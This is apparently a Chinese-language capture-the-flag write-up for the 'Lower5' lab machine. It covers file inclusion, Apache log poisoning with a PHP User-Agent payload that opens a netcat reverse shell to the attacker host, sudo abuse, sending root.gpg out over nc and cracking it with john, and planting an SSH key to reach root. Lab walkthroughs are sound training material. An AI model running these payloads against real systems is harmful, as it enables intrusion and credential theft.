# 靶场搭建
下载地址:Lower5
下载导入,NAT 模式,直接战斗
IP: 10.10.10.10
# 渗透过程
# 信息初收集
扫一下端口看看先
┌──(root㉿kali)-[~]
└─# nmap -p- -sV 10.10.10.10 -T4
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-23 04:06 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:53:7B:EC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds
22 和 80,80 看看呢
喜闻乐见的 web 渗透
可以看到上面的菜单栏的地址 http://10.10.10.10/page.php?inc=about.html ,有文件包含的嫌疑。测测看
┌──(root㉿kali)-[~] | |
└─# curl http://10.10.10.10/page.php?inc=/etc/passwd | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin | |
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin | |
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin | |
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin | |
low:x:1000:1000:low:/home/low:/bin/bash |
存在的
# 漏洞利用
先试读 shadow,爆破密码
┌──(root㉿kali)-[~] | |
└─# curl http://10.10.10.10/page.php?inc=/etc/shadow | |
<b>Security Alert:</b> Intrusion Attempt Detected... |
没有,那就包含日志看看
──(root㉿kali)-[~] | |
└─# curl http://10.10.10.10/page.php?inc=/var/log/apache2/access.log | |
10.10.10.9 - - [23/Oct/2025:10:07:18 +0200] "GET / HTTP/1.0" 200 11884 "-" "-" | |
10.10.10.9 - - [23/Oct/2025:10:07:18 +0200] "GET /nmaplowercheck1761206840 HTTP/1.1" 404 453 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" |
直接包含 php 反弹 shell
┌──(root㉿kali)-[~] | |
└─# curl -s -H "User-Agent: <?php system('busybox nc 10.10.10.9 4444 -e /bin/sh'); ?>" "http://10.10.10.10/" |
┌──(root㉿kali)-[~] | |
└─# curl http://10.10.10.10/page.php?inc=/var/log/apache2/access.log |
拿到 shell
# 提权
升级终端先
┌──(root㉿kali)-[~] | |
└─# nc -lnvp 50088 | |
listening on [any] 50088 ... | |
connect to [10.10.10.9] from (UNKNOWN) [10.10.10.10] 55678 | |
script /dev/null -c bash | |
Script iniciado, el fichero de anotación de salida es '/dev/null'. | |
www-data@lower5:~$ ^Z | |
zsh: suspended nc -lnvp 50088 | |
┌──(root㉿kali)-[~] | |
└─# stty raw -echo;fg | |
[1] + continued nc -lnvp 50088 | |
reset xterm | |
www-data@lower5:~$ export TERM=xterm-256color |
发现 sudo 存在权限滥用
www-data@lower5:/var/www/html$ sudo -l | |
Matching Defaults entries for www-data on lower5: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
use_pty | |
User www-data may run the following commands on lower5: | |
(low) NOPASSWD: /usr/bin/bash |
我们使用 low 用户执行 bash
www-data@lower5:/var/www/html$ sudo -u low /usr/bin/bash | |
low@lower5:/var/www/html$ cd ~ | |
low@lower5:~$ source .bashrc | |
low@lower5:~$ cat user.txt | |
30a7b18992fef054ca6d904769fac413 |
拿到 low 用户权限
发现目录下存在 root.gpg 文件,传到 kali 上,直接 john 跑
┌──(root㉿kali)-[~] | |
└─# nc -lnvp 4433 > gpg | |
listening on [any] 4433 ... | |
connect to [10.10.10.9] from (UNKNOWN) [10.10.10.10] 58330 | |
^C |
low@lower5:~$ nc 10.10.10.9 4433 < root.gpg |
┌──(root㉿kali)-[~] | |
└─# gpg2john gpg > hash | |
File gpg | |
┌──(root㉿kali)-[~] | |
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) | |
Cost 1 (s2k-count) is 65011712 for all loaded hashes | |
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes | |
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes | |
Will run 2 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
0g 0:00:03:04 0.02% (ETA: 2025-11-04 10:00) 0g/s 16.81p/s 16.81c/s 16.81C/s future..carpediem | |
Password1 (administrator) | |
1g 0:00:03:27 DONE (2025-10-23 05:04) 0.004817g/s 16.88p/s 16.88c/s 16.88C/s Password1..wateva | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
拿到密码 Password1 ,但是 su 了一下不行
再探 sudo,发现还有高手
low@lower5:~$ sudo -l | |
Matching Defaults entries for low on lower5: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
use_pty | |
User low may run the following commands on lower5: | |
(root) NOPASSWD: /usr/bin/pass |
sudo 执行这个 pass,总是不成功: sudo pass show root/password
写了一个 rsa 秘钥进去,ssh 连上去拿到终端才可以执行这个。
low@lower5:~$ mkdir .ssh | |
low@lower5:~$ cd .ssh | |
<xTgnit6423E3rS/5LFTtj1bmIEKfdfm01kGRu2+ln root@kali' > authorized_keys |
执行后输入 gpg 的密码 Password1
┌──(root㉿kali)-[~/.ssh] | |
└─# ssh [email protected] | |
The authenticity of host '10.10.10.10 (10.10.10.10)' can't be established. | |
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U. | |
This key is not known by any other names. | |
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | |
Warning: Permanently added '10.10.10.10' (ED25519) to the list of known hosts. | |
low@lower5:~$ sudo pass show /root/password | |
r00tP@zzW0rD123 | |
low@lower5:~$ su - | |
Contraseña: | |
root@lower5:~# cat root.txt | |
008cdc7563e1d5afbcac3a241eba4db8 |
最后才拿到 root 的密码 r00tP@zzW0rD123
# 解析
特意给留的一个口子
root@lower5:/var/www/html# cat page.php | |
<?php | |
$file = $_GET["inc"]; | |
if (isset($file) && ($file === "about.html" || $file === "services.html" || $file === "portfolio.html" || $file === "contact.html" || $file === "/etc/passwd" || $file === "/var/log/apache2/access.log")) { | |
include($file); | |
} else { | |
echo "<b>Security Alert:</b> Intrusion Attempt Detected..."; | |
} | |
?> |
